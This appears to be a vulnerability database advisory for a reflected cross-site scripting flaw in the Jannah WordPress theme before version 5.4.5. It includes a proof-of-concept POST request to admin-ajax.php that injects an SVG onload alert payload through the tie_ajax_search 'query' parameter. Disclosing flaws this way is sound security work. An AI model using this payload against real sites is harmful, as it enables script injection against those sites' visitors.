Themes Vulnerabilities

Jannah < 5.4.5 - Reflected Cross-Site Scripting (XSS)

Description

The theme did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability.

Proof of Concept

POST /demo/wp-admin/admin-ajax.php HTTP/1.1
Host: jannah.tielabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 66
Connection: close

action=tie_ajax_search&query[]=<svg+onload=alert(document.domain)>

Affects Themes

Fixed in 5.4.5

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Truoc Phan from Techlab Corporation
Submitter
Truoc Phan
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2021-06-14 (about 2 years ago)
Added
2021-06-14 (about 2 years ago)
Last Updated
2021-06-25 (about 2 years ago)

Other